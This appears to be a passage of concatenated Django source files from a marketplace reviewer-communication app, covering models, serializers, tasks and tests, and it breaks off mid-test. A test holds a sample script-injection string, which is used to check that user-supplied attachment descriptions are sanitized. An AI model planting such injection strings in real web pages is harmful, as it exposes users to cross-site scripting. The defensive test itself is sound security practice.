    read_by_users = models.ManyToManyField(
        'users.UserProfile', through='CommunicationNoteRead')
    objects = CommunicationNoteManager()
    class Meta:
        db_table = 'comm_thread_notes'
    def save(self, *args, **kwargs):
        # Bump the parent thread's modified time so threads sort by
        # latest activity.
        super(CommunicationNote, self).save(*args, **kwargs)
        self.thread.modified = self.created
        self.thread.save()
    def mark_read(self, user):
        """Record that `user` has read this note (idempotent)."""
        self.reads_set.get_or_create(user=user)
class CommAttachment(amo.models.ModelBase):
    """
    Model for an attachment to an CommNote instance. Used by the Marketplace
    reviewer tools, where reviewers can attach files to comments made during
    the review process.
    """
    note = models.ForeignKey('CommunicationNote', related_name='attachments')
    # Path relative to settings.REVIEWER_ATTACHMENTS_PATH.
    filepath = models.CharField(max_length=255)
    description = models.CharField(max_length=255, blank=True)
    mimetype = models.CharField(max_length=255, blank=True)
    class Meta:
        db_table = 'comm_attachments'
        ordering = ('id',)
    def __unicode__(self):
        return 'Note %s - %s' % (self.note.id, self.filepath)
    def get_absolute_url(self):
        return reverse('comm-attachment-detail', args=[self.note_id, self.pk])
    def filename(self):
        """Returns the attachment's file name."""
        return os.path.basename(self.filepath)
    def full_path(self):
        """Returns the full filesystem path of the attachment."""
        try:
            return os.path.join(settings.REVIEWER_ATTACHMENTS_PATH,
                                self.filepath)
        except IOError:
            # NOTE(review): os.path.join does not normally raise IOError;
            # this guard looks vestigial -- confirm before removing.
            if not settings.DEBUG:
                raise
    def display_name(self):
        """
        Returns a string describing the attachment suitable for front-end
        display.
        """
        # Sanitized with bleach since the description is user-supplied.
        display = self.description if self.description else self.filename()
        return mark_safe(bleach.clean(display))
    def is_image(self):
        """
        Returns a boolean indicating whether the attached file is an image of a
        format recognizable by the stdlib imghdr module.
        """
        try:
            return imghdr.what(self.full_path()) is not None
        except IOError:
            # Missing file: swallowed in DEBUG, re-raised otherwise.
            if not settings.DEBUG:
                raise
class CommunicationNoteRead(models.Model):
    """Through-model recording that a user has read a note."""
    user = models.ForeignKey('users.UserProfile')
    note = models.ForeignKey(CommunicationNote, related_name='reads_set')
    class Meta:
        db_table = 'comm_notes_read'
class CommunicationThreadToken(amo.models.ModelBase):
    """Per-(thread, user) token allowing replies to a thread by email."""
    thread = models.ForeignKey(CommunicationThread, related_name='token')
    user = models.ForeignKey('users.UserProfile',
                             related_name='comm_thread_tokens')
    uuid = UUIDField(unique=True, auto=True)
    use_count = models.IntegerField(default=0,
        help_text='Stores the number of times the token has been used')
    class Meta:
        db_table = 'comm_thread_tokens'
        unique_together = ('thread', 'user')
    def is_valid(self):
        """Token is valid while unexpired and under the max use count."""
        # TODO: Confirm the expiration and max use count values.
        timedelta = datetime.now() - self.modified
        return (timedelta.days <= comm.THREAD_TOKEN_EXPIRY and
                self.use_count < comm.MAX_TOKEN_USE_COUNT)
    def reset_uuid(self):
        # Generate a new UUID.
        self.uuid = UUIDField()._create_uuid().hex
# Keep translated fields in sync when a note is saved.
models.signals.pre_save.connect(save_signal, sender=CommunicationNote,
                                dispatch_uid='comm_thread_notes_translations')
########NEW FILE########
__FILENAME__ = serializers
from django.core.urlresolvers import reverse
from rest_framework.fields import BooleanField, CharField
from rest_framework.serializers import ModelSerializer, SerializerMethodField
from addons.models import Addon
from amo.helpers import absolutify
from mkt.comm.models import (CommAttachment, CommunicationNote,
CommunicationThread)
from users.models import UserProfile
from versions.models import Version
class AuthorSerializer(ModelSerializer):
    """Exposes just the display name of a note's author."""
    name = CharField()
    class Meta:
        model = UserProfile
        fields = ('name',)
class AttachmentSerializer(ModelSerializer):
    """Serializes a CommAttachment with an absolute download URL."""
    url = SerializerMethodField('get_absolute_url')
    display_name = CharField(source='display_name')
    is_image = BooleanField(source='is_image')
    def get_absolute_url(self, obj):
        # Absolute URL so API consumers don't need the site prefix.
        return absolutify(obj.get_absolute_url())
    class Meta:
        model = CommAttachment
        fields = ('id', 'created', 'url', 'display_name', 'is_image')
class NoteSerializer(ModelSerializer):
    """Serializes a CommunicationNote, including the requesting user's
    read state."""
    body = CharField()
    author_meta = AuthorSerializer(source='author', read_only=True)
    is_read = SerializerMethodField('is_read_by_user')
    attachments = AttachmentSerializer(source='attachments', read_only=True)
    def is_read_by_user(self, obj):
        # Whether the authenticated user has already read this note.
        return obj.read_by_users.filter(
            pk=self.context['request'].amo_user.id).exists()
    class Meta:
        model = CommunicationNote
        fields = ('id', 'created', 'attachments', 'author', 'author_meta',
                  'body', 'is_read', 'note_type', 'thread')
class AddonSerializer(ModelSerializer):
    """Summary of the app a thread belongs to."""
    name = CharField()
    thumbnail_url = SerializerMethodField('get_icon')
    url = CharField(source='get_absolute_url')
    review_url = SerializerMethodField('get_review_url')
    class Meta:
        model = Addon
        fields = ('id', 'name', 'url', 'thumbnail_url', 'app_slug', 'slug',
                  'review_url')
    def get_icon(self, app):
        # 64px icon used as the thumbnail in thread listings.
        return app.get_icon_url(64)
    def get_review_url(self, obj):
        return reverse('reviewers.apps.review', args=[obj.app_slug])
class ThreadSerializer(ModelSerializer):
    """Serializes a thread with app metadata and its most recent notes."""
    addon_meta = AddonSerializer(source='addon', read_only=True)
    recent_notes = SerializerMethodField('get_recent_notes')
    notes_count = SerializerMethodField('get_notes_count')
    version_number = SerializerMethodField('get_version_number')
    version_is_obsolete = SerializerMethodField('get_version_is_obsolete')
    class Meta:
        model = CommunicationThread
        fields = ('id', 'addon', 'addon_meta', 'version', 'notes_count',
                  'recent_notes', 'created', 'modified', 'version_number',
                  'version_is_obsolete')
        view_name = 'comm-thread-detail'
    def get_recent_notes(self, obj):
        # Last five notes the requesting user is allowed to see.
        notes = (obj.notes.with_perms(self.get_request().amo_user, obj)
                 .order_by('-created')[:5])
        return NoteSerializer(
            notes, many=True, context={'request': self.get_request()}).data
    def get_notes_count(self, obj):
        return obj.notes.count()
    def get_version_number(self, obj):
        # Include deleted versions so old threads still show a number.
        try:
            return Version.with_deleted.get(id=obj.version_id).version
        except Version.DoesNotExist:
            return ''
    def get_version_is_obsolete(self, obj):
        # A missing version counts as obsolete.
        try:
            return Version.with_deleted.get(id=obj.version_id).deleted
        except Version.DoesNotExist:
            return True
########NEW FILE########
__FILENAME__ = tasks
import logging
from celeryutils import task
from amo.decorators import write
from devhub.models import ActivityLog
from mkt.comm.models import (CommunicationNote, CommunicationNoteRead,
CommunicationThread)
from mkt.comm.utils import filter_notes_by_read_status, save_from_email_reply
import mkt.constants.comm as cmb
log = logging.getLogger('z.task')
@task
def consume_email(email_text, **kwargs):
    """Parse emails and save notes."""
    res = save_from_email_reply(email_text)
    if not res:
        # Nothing saved: bad token, no permission, or unparseable email.
        log.error('Failed to save email.')
@task
def mark_thread_read(thread, user, **kwargs):
    """This marks each unread note in a thread as read - in bulk."""
    unread_notes = filter_notes_by_read_status(thread.notes, user, False)
    # Build all the read markers first, then insert them in one query.
    CommunicationNoteRead.objects.bulk_create(
        [CommunicationNoteRead(note=note, user=user)
         for note in unread_notes])
@task
@write
def _migrate_activity_log(ids, **kwargs):
    """For migrate_activity_log.py script.

    Converts the ActivityLog rows with the given ids into
    CommunicationThread/CommunicationNote rows plus attachments.
    Idempotent: logs whose note (or attachments) already exist are
    skipped.
    """
    # Loop variable is `activity`, not `log`, so the module-level logger
    # `log` is no longer shadowed inside this task.
    for activity in ActivityLog.objects.filter(pk__in=ids):
        action = cmb.ACTION_MAP(activity.action)
        # Create thread.
        try:
            thread, tc = CommunicationThread.objects.safer_get_or_create(
                addon=activity.arguments[0], version=activity.arguments[1])
        except IndexError:
            # Log is missing its (addon, version) arguments; skip it.
            continue
        # Filter notes.
        note_params = {
            'thread': thread,
            'note_type': action,
            'author': activity.user,
            'body': (activity.details.get('comments', '')
                     if activity.details else ''),
        }
        notes = CommunicationNote.objects.filter(created=activity.created,
                                                 **note_params)
        if notes.exists():
            # Note already exists, move on.
            continue
        # Create note.
        note = CommunicationNote.objects.create(
            # Developers should not see escalate/reviewer comments.
            read_permission_developer=action not in cmb.REVIEWER_NOTE_TYPES,
            **note_params)
        note.update(created=activity.created)
        # Attachments.
        if note.attachments.exists():
            # Already migrated. Continue.
            continue
        # Create attachments.
        for attachment in activity.activitylogattachment_set.all():
            note_attachment = note.attachments.create(
                filepath=attachment.filepath, mimetype=attachment.mimetype,
                description=attachment.description)
            note_attachment.update(created=attachment.created)
########NEW FILE########
__FILENAME__ = test_commands
from django.core.management import call_command
from nose.tools import eq_
import amo
import amo.tests
from devhub.models import ActivityLog, ActivityLogAttachment
from users.models import UserProfile
import mkt.constants.comm as cmb
from mkt.comm.models import CommunicationNote, CommunicationThread
from mkt.site.fixtures import fixture
class TestMigrateActivityLog(amo.tests.TestCase):
    """Tests for the one-off migrate_activity_log management command."""
    fixtures = fixture('group_editor', 'user_editor', 'user_editor_group')
    def setUp(self):
        self.app = amo.tests.app_factory(status=amo.STATUS_PENDING)
        self.version = self.app.current_version
        self.user = UserProfile.objects.get()
    def _assert(self, cmb_action):
        """Run the command; assert a single thread/note was migrated."""
        call_command('migrate_activity_log')
        thread = CommunicationThread.objects.get()
        note = CommunicationNote.objects.get()
        eq_(thread.addon, self.app)
        eq_(thread.version, self.version)
        eq_(note.thread, thread)
        eq_(note.author, self.user)
        eq_(note.body, 'something')
        eq_(note.note_type, cmb_action)
        eq_(note.read_permission_staff, True)
        eq_(note.read_permission_reviewer, True)
        eq_(note.read_permission_senior_reviewer, True)
        eq_(note.read_permission_mozilla_contact, True)
        return thread, note
    def test_migrate(self):
        amo.log(amo.LOG.APPROVE_VERSION, self.app, self.version,
                user=self.user, details={'comments': 'something'})
        self._assert(cmb.APPROVAL)
    def test_migrate_reject(self):
        amo.log(amo.LOG.REJECT_VERSION, self.app, self.version,
                user=self.user, details={'comments': 'something'})
        self._assert(cmb.REJECTION)
    def test_migrate_disable(self):
        amo.log(amo.LOG.APP_DISABLED, self.app, self.version,
                user=self.user, details={'comments': 'something'})
        self._assert(cmb.DISABLED)
    def test_migrate_escalation(self):
        amo.log(amo.LOG.ESCALATE_VERSION, self.app, self.version,
                user=self.user, details={'comments': 'something'})
        thread, note = self._assert(cmb.ESCALATION)
        # Escalations must be hidden from developers.
        assert not note.read_permission_developer
    def test_migrate_reviewer_comment(self):
        amo.log(amo.LOG.COMMENT_VERSION, self.app, self.version,
                user=self.user, details={'comments': 'something'})
        thread, note = self._assert(cmb.REVIEWER_COMMENT)
        assert not note.read_permission_developer
    def test_migrate_info(self):
        amo.log(amo.LOG.REQUEST_INFORMATION, self.app, self.version,
                user=self.user, details={'comments': 'something'})
        self._assert(cmb.MORE_INFO_REQUIRED)
    def test_migrate_noaction(self):
        amo.log(amo.LOG.REQUEST_VERSION, self.app, self.version,
                user=self.user, details={'comments': 'something'})
        self._assert(cmb.NO_ACTION)
    def test_migrate_escalation_high_abuse(self):
        amo.log(amo.LOG.ESCALATED_HIGH_ABUSE, self.app, self.version,
                user=self.user, details={'comments': 'something'})
        thread, note = self._assert(cmb.ESCALATION_HIGH_ABUSE)
        assert not note.read_permission_developer
    def test_migrate_escalation_high_refunds(self):
        amo.log(amo.LOG.ESCALATED_HIGH_REFUNDS, self.app, self.version,
                user=self.user, details={'comments': 'something'})
        thread, note = self._assert(cmb.ESCALATION_HIGH_REFUNDS)
        assert not note.read_permission_developer
    def test_migrate_escalation_cleared(self):
        amo.log(amo.LOG.ESCALATION_CLEARED, self.app, self.version,
                user=self.user, details={'comments': 'something'})
        thread, note = self._assert(cmb.ESCALATION_CLEARED)
        assert not note.read_permission_developer
    def test_get_or_create(self):
        # Running the command repeatedly must not duplicate notes.
        amo.log(amo.LOG.REQUEST_VERSION, self.app, self.version,
                user=self.user, details={'comments': 'something'})
        self._assert(cmb.NO_ACTION)
        call_command('migrate_activity_log')
        call_command('migrate_activity_log')
        eq_(CommunicationNote.objects.count(), 1)
        amo.log(amo.LOG.REQUEST_VERSION, self.app, self.version,
                user=self.user, details={'comments': 'somethingNEW'})
        call_command('migrate_activity_log')
        eq_(CommunicationNote.objects.count(), 2)
        eq_(CommunicationThread.objects.count(), 1)
    def test_empty_comment(self):
        amo.log(amo.LOG.REQUEST_VERSION, self.app, self.version,
                user=self.user, details={})
        call_command('migrate_activity_log')
        note = CommunicationNote.objects.get()
        eq_(note.thread.addon, self.app)
        eq_(note.body, '')
    def test_none(self):
        call_command('migrate_activity_log')
        assert not CommunicationThread.objects.exists()
        assert not CommunicationNote.objects.exists()
    def test_migrate_attachments(self):
        amo.log(amo.LOG.APPROVE_VERSION, self.app, self.version,
                user=self.user, details={'comments': 'something'})
        ActivityLogAttachment.objects.create(
            activity_log=ActivityLog.objects.get(), filepath='lol',
            description='desc1', mimetype='img')
        ActivityLogAttachment.objects.create(
            activity_log=ActivityLog.objects.get(), filepath='rofl',
            description='desc2', mimetype='txt')
        call_command('migrate_activity_log')
        note = CommunicationNote.objects.get()
        eq_(note.attachments.count(), 2)
        note_attach1 = note.attachments.get(filepath='lol')
        eq_(note_attach1.description, 'desc1')
        eq_(note_attach1.mimetype, 'img')
        note_attach2 = note.attachments.get(filepath='rofl')
        eq_(note_attach2.description, 'desc2')
        eq_(note_attach2.mimetype, 'txt')
########NEW FILE########
__FILENAME__ = test_forms
from nose.tools import eq_
import amo.tests
from mkt.comm.forms import CreateCommThreadForm
from mkt.constants import comm
class TestCreateCommThreadForm(amo.tests.TestCase):
    """Validation tests for CreateCommThreadForm."""
    def setUp(self):
        self.app = amo.tests.app_factory()
    def _data(self, **kwargs):
        # Valid form data by default; override fields via kwargs.
        data = {
            'app': self.app.app_slug,
            'version': self.app.current_version.version,
            'note_type': comm.NO_ACTION,
            'body': 'note body'
        }
        data.update(**kwargs)
        return data
    def test_basic(self):
        data = self._data()
        form = CreateCommThreadForm(data)
        assert form.is_valid()
        eq_(form.cleaned_data['app'], self.app)
        eq_(form.cleaned_data['version'], self.app.current_version)
    def test_version_does_not_exist(self):
        data = self._data(version='1234.9')
        form = CreateCommThreadForm(data)
        assert not form.is_valid()
########NEW FILE########
__FILENAME__ = test_models
from datetime import datetime
from os import path
from django.core.urlresolvers import NoReverseMatch
from django.test.utils import override_settings
from nose.tools import eq_, ok_
from addons.models import Addon
import amo.tests
from users.models import UserProfile
from mkt.comm.models import (CommAttachment, CommunicationNote,
CommunicationThread, CommunicationThreadCC,
CommunicationThreadToken,
user_has_perm_app, user_has_perm_note,
user_has_perm_thread)
from mkt.comm.tests.test_views import CommTestMixin
from mkt.constants import comm as const
# Directory holding the attachment fixtures used by these tests.
TESTS_DIR = path.dirname(path.abspath(__file__))
ATTACHMENTS_DIR = path.join(TESTS_DIR, 'attachments')
class PermissionTestMixin(object):
    """Shared permission tests; subclasses set self.type and self.obj."""
    fixtures = ['base/addon_3615', 'base/user_999']
    def setUp(self):
        self.addon = Addon.objects.get()
        self.user = UserProfile.objects.get(username='regularuser')
        self.thread = CommunicationThread.objects.create(addon=self.addon)
        self.author = UserProfile.objects.create(email='lol', username='lol')
        self.note = CommunicationNote.objects.create(
            thread=self.thread, author=self.author, note_type=0, body='xyz')
        self.obj = None
    def _eq_obj_perm(self, val):
        # Dispatch to the right permission checker for the object type.
        if self.type == 'note':
            eq_(user_has_perm_note(self.obj, self.user), val)
        else:
            eq_(user_has_perm_thread(self.obj, self.user), val)
    def test_no_perm(self):
        self._eq_obj_perm(False)
    def test_has_perm_public(self):
        self.obj.update(read_permission_public=True)
        self._eq_obj_perm(True)
    def test_has_perm_dev(self):
        self.obj.update(read_permission_developer=True)
        self.addon.addonuser_set.create(user=self.user)
        self._eq_obj_perm(True)
    def test_has_perm_rev(self):
        self.obj.update(read_permission_reviewer=True)
        self.grant_permission(self.user, 'Apps:Review')
        self._eq_obj_perm(True)
    def test_has_perm_senior_rev(self):
        self.obj.update(read_permission_senior_reviewer=True)
        self.grant_permission(self.user, 'Apps:ReviewEscalated')
        self._eq_obj_perm(True)
    def test_has_perm_moz_contact(self):
        self.obj.update(read_permission_mozilla_contact=True)
        self.addon.update(
            mozilla_contact=','.join([self.user.email, '[email protected]']))
        self._eq_obj_perm(True)
    def test_has_perm_staff(self):
        self.obj.update(read_permission_staff=True)
        self.grant_permission(self.user, 'Admin:*')
        self._eq_obj_perm(True)
class TestCommunicationNote(PermissionTestMixin, amo.tests.TestCase):
    """Note-level permission checks (see PermissionTestMixin)."""
    def setUp(self):
        super(TestCommunicationNote, self).setUp()
        self.type = 'note'
        self.obj = self.note
    def test_has_perm_author(self):
        self.obj.update(author=self.user)
        self._eq_obj_perm(True)
    def test_manager(self):
        # with_perms() filters out notes the user cannot read.
        eq_(CommunicationNote.objects.count(), 1)
        eq_(CommunicationNote.objects.with_perms(self.user,
                                                 self.thread).count(), 0)
        self.note.update(author=self.user)
        eq_(CommunicationNote.objects.with_perms(self.user,
                                                 self.thread).count(), 1)
class TestCommunicationThread(PermissionTestMixin, amo.tests.TestCase):
    """Thread-level permission checks (see PermissionTestMixin)."""
    def setUp(self):
        super(TestCommunicationThread, self).setUp()
        self.type = 'thread'
        self.obj = self.thread
    def test_has_perm_posted(self):
        self.note.update(author=self.user)
        self._eq_obj_perm(True)
    def test_has_perm_cc(self):
        CommunicationThreadCC.objects.create(user=self.user, thread=self.obj)
        self._eq_obj_perm(True)
    def test_has_perm_app_reviewer(self):
        ok_(not user_has_perm_app(self.user, self.addon))
        self.grant_permission(self.user, 'Apps:Review')
        ok_(user_has_perm_app(self.user, self.addon))
    def test_has_perm_app_developer(self):
        ok_(not user_has_perm_app(self.user, self.addon))
        self.addon.addonuser_set.create(user=self.user)
        ok_(user_has_perm_app(self.user, self.addon))
class TestThreadTokenModel(amo.tests.TestCase):
    """Expiry / use-count behaviour of CommunicationThreadToken."""
    fixtures = ['base/addon_3615', 'base/user_999']
    def setUp(self):
        addon = Addon.objects.get(pk=3615)
        self.thread = CommunicationThread(addon=addon)
        user = UserProfile.objects.all()[0]
        self.token = CommunicationThreadToken(thread=self.thread, user=user)
        self.token.modified = datetime.now()
        self.token.use_count = 0
    def test_live_thread_token_is_valid(self):
        """
        Test `is_valid()` when the token is fresh (not expired).
        """
        assert self.token.is_valid()
    def test_expired_thread_token_is_valid(self):
        """
        Test `is_valid()` when the token has expired.
        """
        self.token.modified = self.days_ago(const.THREAD_TOKEN_EXPIRY + 1)
        assert not self.token.is_valid()
    def test_unused_token_is_valid(self):
        """
        Test `is_valid()` when the token is unused.
        """
        assert self.token.is_valid()
    def test_max_used_thread_token_is_valid(self):
        """
        Test `is_valid()` when the token has been fully used.
        """
        self.token.use_count = const.MAX_TOKEN_USE_COUNT
        assert not self.token.is_valid()
    def test_reset_uuid(self):
        """
        Test `reset_uuid()` generates a different uuid.
        """
        self.thread.save()
        self.token.thread = self.thread
        self.token.save()
        uuid = self.token.uuid
        assert uuid
        self.token.reset_uuid()
        assert self.token.uuid
        assert uuid != self.token.uuid
@override_settings(REVIEWER_ATTACHMENTS_PATH=ATTACHMENTS_DIR)
class TestCommAttachment(amo.tests.TestCase, CommTestMixin):
    """Behaviour of CommAttachment helpers (paths, names, sanitizing)."""
    fixtures = ['base/addon_3615']
    XSS_STRING = 'MMM <script>alert(bacon);</script>'
    def setUp(self):
        self.user = amo.tests.user_factory(username='porkbelly')
        amo.set_user(self.user)
        self.profile = self.user
        self.addon = Addon.objects.get()
        self.version = self.addon.latest_version
        self.thread = self._thread_factory()
        self.note = self._note_factory(self.thread)
        self.attachment1, self.attachment2 = self._attachments(self.note)
    def _attachments(self, note):
        """
        Create and return a tuple of CommAttachment instances.
        """
        ala1 = CommAttachment.objects.create(note=note,
                                             filepath='bacon.txt',
                                             mimetype='text/plain')
        ala2 = CommAttachment.objects.create(note=note,
                                             filepath='bacon.jpg',
                                             description=self.XSS_STRING,
                                             mimetype='image/jpeg')
        return ala1, ala2
    def test_filename(self):
        msg = 'CommAttachment().filename() returning incorrect filename.'
        eq_(self.attachment1.filename(), 'bacon.txt', msg)
        eq_(self.attachment2.filename(), 'bacon.jpg', msg)
    def test_full_path_dirname(self):
        msg = 'CommAttachment().full_path() returning incorrect path.'
        FAKE_PATH = '/tmp/attachments/'
        with self.settings(REVIEWER_ATTACHMENTS_PATH=FAKE_PATH):
            eq_(self.attachment1.full_path(), FAKE_PATH + 'bacon.txt', msg)
            eq_(self.attachment2.full_path(), FAKE_PATH + 'bacon.jpg', msg)
    def test_display_name(self):
        msg = ('CommAttachment().display_name() returning '
               'incorrect display name.')
        eq_(self.attachment1.display_name(), 'bacon.txt', msg)
    def test_display_name_xss(self):
        # User-supplied description must be sanitized.
        ok_('<script>' not in self.attachment2.display_name())
    def test_is_image(self):
        msg = 'CommAttachment().is_image() not correctly detecting images.'
        eq_(self.attachment1.is_image(), False, msg)
        eq_(self.attachment2.is_image(), True, msg)
    def test_get_absolute_url(self):
        try:
            self.attachment1.get_absolute_url()
            self.attachment2.get_absolute_url()
        except NoReverseMatch:
            assert False, 'CommAttachment.get_absolute_url NoReverseMatch'
########NEW FILE########
__FILENAME__ = test_utils_
import os.path
from django.conf import settings
from django.core.files.uploadedfile import SimpleUploadedFile
import mock
from nose.tools import eq_
import amo
from amo.tests import app_factory, TestCase, user_factory
from users.models import UserProfile
from mkt.comm.forms import CommAttachmentFormSet
from mkt.comm.models import CommunicationThread, CommunicationThreadToken
from mkt.comm.tests.test_views import AttachmentManagementMixin
from mkt.comm.utils import (CommEmailParser, create_comm_note,
save_from_email_reply)
from mkt.constants import comm
from mkt.site.fixtures import fixture
# Fixture: a raw reply email used by the parser/saving tests below.
sample_email = os.path.join(settings.ROOT, 'mkt', 'comm', 'tests',
                            'email.txt')
class TestEmailReplySaving(TestCase):
    """save_from_email_reply() token-validation and permission paths."""
    fixtures = fixture('user_999')
    def setUp(self):
        app = app_factory(name='Antelope', status=amo.STATUS_PENDING)
        self.profile = UserProfile.objects.get(pk=999)
        t = CommunicationThread.objects.create(addon=app,
            version=app.current_version, read_permission_reviewer=True)
        self.create_switch('comm-dashboard')
        self.token = CommunicationThreadToken.objects.create(thread=t,
            user=self.profile)
        # Match the uuid embedded in the sample email fixture.
        self.token.update(uuid='5a0b8a83d501412589cc5d562334b46b')
        self.email_base64 = open(sample_email).read()
        self.grant_permission(self.profile, 'Apps:Review')
    def test_successful_save(self):
        note = save_from_email_reply(self.email_base64)
        assert note
        eq_(note.body, 'test note 5\n')
    def test_with_max_count_token(self):
        # Test with an invalid token.
        self.token.update(use_count=comm.MAX_TOKEN_USE_COUNT + 1)
        assert not save_from_email_reply(self.email_base64)
    def test_with_unpermitted_token(self):
        """Test when the token's user does not have a permission on thread."""
        self.profile.groupuser_set.filter(
            group__rules__contains='Apps:Review').delete()
        assert not save_from_email_reply(self.email_base64)
    def test_non_existent_token(self):
        self.token.update(uuid='youtube?v=wn4RP57Y7bw')
        assert not save_from_email_reply(self.email_base64)
    def test_with_invalid_msg(self):
        assert not save_from_email_reply('youtube?v=WwJjts9FzxE')
class TestEmailParser(TestCase):
    """Sanity checks for CommEmailParser on the sample email fixture."""
    def setUp(self):
        email_text = open(sample_email).read()
        self.parser = CommEmailParser(email_text)
    def test_uuid(self):
        eq_(self.parser.get_uuid(), '5a0b8a83d501412589cc5d562334b46b')
    def test_body(self):
        eq_(self.parser.get_body(), 'test note 5\n')
class TestCreateCommNote(TestCase, AttachmentManagementMixin):
    """create_comm_note(): thread/note creation, perms, CC, attachments."""
    def setUp(self):
        self.create_switch('comm-dashboard')
        self.contact = user_factory(username='contact')
        self.user = user_factory()
        self.grant_permission(self.user, '*:*')
        self.app = app_factory(mozilla_contact=self.contact.email)
    def test_create_thread(self):
        # Default permissions.
        thread, note = create_comm_note(
            self.app, self.app.current_version, self.user, 'huehue',
            note_type=comm.APPROVAL)
        # Check Thread.
        eq_(thread.addon, self.app)
        eq_(thread.version, self.app.current_version)
        expected = {
            'public': False, 'developer': True, 'reviewer': True,
            'senior_reviewer': True, 'mozilla_contact': True, 'staff': True}
        for perm, has_perm in expected.items():
            eq_(getattr(thread, 'read_permission_%s' % perm), has_perm, perm)
        # Check Note.
        eq_(note.thread, thread)
        eq_(note.author, self.user)
        eq_(note.body, 'huehue')
        eq_(note.note_type, comm.APPROVAL)
        # Check CC.
        eq_(thread.thread_cc.count(), 2)
        assert thread.thread_cc.filter(user=self.contact).exists()
        assert thread.thread_cc.filter(user=self.user).exists()
        # Check Reads.
        eq_(note.read_by_users.count(), 2)
    def test_create_note_existing_thread(self):
        # Initial note.
        thread, note = create_comm_note(
            self.app, self.app.current_version, self.user, 'huehue')
        # Second note from contact.
        thread, reply = create_comm_note(
            self.app, self.app.current_version, self.contact, 'euheuh!',
            note_type=comm.REJECTION)
        # Mark read by author.
        eq_(reply.read_by_users.count(), 1)
        # Third person joins thread.
        thread, last_word = create_comm_note(
            self.app, self.app.current_version, user_factory(), 'euheuh!',
            note_type=comm.MORE_INFO_REQUIRED)
        # More checking that joining a thread marks all old notes as read.
        eq_(thread.thread_cc.count(), 3)
        eq_(note.read_by_users.count(), 3)
        eq_(last_word.read_by_users.count(), 1)
    @mock.patch('mkt.comm.utils.post_create_comm_note', new=mock.Mock)
    def test_custom_perms(self):
        thread, note = create_comm_note(
            self.app, self.app.current_version, self.user, 'escalatedquickly',
            note_type=comm.ESCALATION, perms={'developer': False,
                                              'staff': True})
        expected = {
            'public': False, 'developer': False, 'reviewer': True,
            'senior_reviewer': True, 'mozilla_contact': True, 'staff': True}
        for perm, has_perm in expected.items():
            eq_(getattr(thread, 'read_permission_%s' % perm), has_perm, perm)
    @mock.patch('mkt.comm.utils.post_create_comm_note', new=mock.Mock)
    def test_attachments(self):
        attach_formdata = self._attachment_management_form(num=2)
        attach_formdata.update(self._attachments(num=2))
        attach_formset = CommAttachmentFormSet(
            attach_formdata,
            {'form-0-attachment':
                 SimpleUploadedFile(
                     'lol', attach_formdata['form-0-attachment'].read()),
             'form-1-attachment':
                 SimpleUploadedFile(
                     'lol2', attach_formdata['form-1-attachment'].read())})
        thread, note = create_comm_note(
            self.app, self.app.current_version, self.user, 'lol',
            note_type=comm.APPROVAL, attachments=attach_formset)
        eq_(note.attachments.count(), 2)
########NEW FILE########
__FILENAME__ = test_views
import json
import os
from django.conf import settings
from django.core import mail
from django.core.urlresolvers import reverse
from django.test.client import MULTIPART_CONTENT
from django.test.utils import override_settings
import mock
from nose.exc import SkipTest
from nose.tools import eq_, ok_
from amo.tests import (addon_factory, req_factory_factory, user_factory,
version_factory)
from users.models import UserProfile
import mkt.constants.comm
from mkt.api.tests.test_oauth import RestOAuth
from mkt.comm.views import EmailCreationPermission, post_email, ThreadPermission
from mkt.comm.models import (CommAttachment, CommunicationNote,
CommunicationThread, CommunicationThreadCC)
from mkt.site.fixtures import fixture
from mkt.webapps.models import Webapp
TESTS_DIR = os.path.dirname(os.path.abspath(__file__))
ATTACHMENTS_DIR = os.path.join(TESTS_DIR, 'attachments')
class CommTestMixin(object):
    """Helpers for building comm threads and notes with permission flags."""

    def _perm_flags(self, perms, no_perms):
        # Translate group names into read_permission_<group> kwargs:
        # names in `perms` become True, names in `no_perms` become False.
        flags = dict(('read_permission_%s' % group, True)
                     for group in perms or [])
        flags.update(('read_permission_%s' % group, False)
                     for group in no_perms or [])
        return flags

    def _thread_factory(self, note=False, perms=None, no_perms=None, **kw):
        """Create a thread on self.addon; optionally seed a note + CC."""
        kw.update(self._perm_flags(perms, no_perms))
        created = self.addon.threads.create(**kw)
        if note:
            self._note_factory(created)
            CommunicationThreadCC.objects.create(user=self.profile,
                                                 thread=created)
        return created

    def _note_factory(self, thread, perms=None, no_perms=None, **kw):
        """Create a note on `thread` (defaults: self.profile, 'something')."""
        author = kw.pop('author', self.profile)
        body = kw.pop('body', 'something')
        kw.update(self._perm_flags(perms, no_perms))
        return thread.notes.create(author=author, body=body, **kw)
class AttachmentManagementMixin(object):
    """Helpers producing POST data for attachment formsets in tests."""

    def _attachment_management_form(self, num=1):
        """
        Generate and return data for a management form for `num` attachments.

        Django formsets require at least one form, hence the max(1, num).
        """
        return {'form-TOTAL_FORMS': max(1, num),
                'form-INITIAL_FORMS': 0,
                'form-MAX_NUM_FORMS': 1000}

    def _attachments(self, num):
        """Generate and return form data for `num` attachment files.

        Files alternate between bacon.txt (even slots) and bacon.jpg
        (odd slots). The file objects are intentionally left open: the
        test client / formset reads them after this method returns.
        """
        data = {}
        files = ['bacon.jpg', 'bacon.txt']
        descriptions = ['mmm, bacon', '']
        for n in xrange(num):
            i = 0 if n % 2 else 1
            path = os.path.join(ATTACHMENTS_DIR, files[i])
            # Open in binary mode: bacon.jpg is a binary file and text
            # mode ('r') would corrupt reads on platforms that translate
            # line endings.
            attachment = open(path, 'rb')
            data.update({
                'form-%d-attachment' % n: attachment,
                'form-%d-description' % n: descriptions[i]
            })
        return data
class TestThreadDetail(RestOAuth, CommTestMixin):
    # Tests for the comm-thread-detail endpoint: response shape, per-group
    # read permissions, and marking a thread's notes as read.
    fixtures = fixture('webapp_337141', 'user_2519', 'user_support_staff')
    def setUp(self):
        super(TestThreadDetail, self).setUp()
        self.addon = Webapp.objects.get(pk=337141)
    def check_permissions(self, thread):
        # Ask ThreadPermission directly whether self.profile may view
        # `thread`, using a request built against the detail URL.
        req = req_factory_factory(
            reverse('comm-thread-detail', kwargs={'pk': thread.pk}),
            user=self.profile)
        return ThreadPermission().has_object_permission(
            req, 'comm-thread-detail', thread)
    def test_response(self):
        # Basic GET returns the thread with its recent notes and addon id.
        thread = self._thread_factory(note=True)
        res = self.client.get(
            reverse('comm-thread-detail', kwargs={'pk': thread.pk}))
        eq_(res.status_code, 200)
        eq_(len(res.json['recent_notes']), 1)
        eq_(res.json['addon'], self.addon.id)
    def test_recent_notes_perm(self):
        # recent_notes must be filtered by note-level permissions: a
        # developer sees developer-visible notes plus their own.
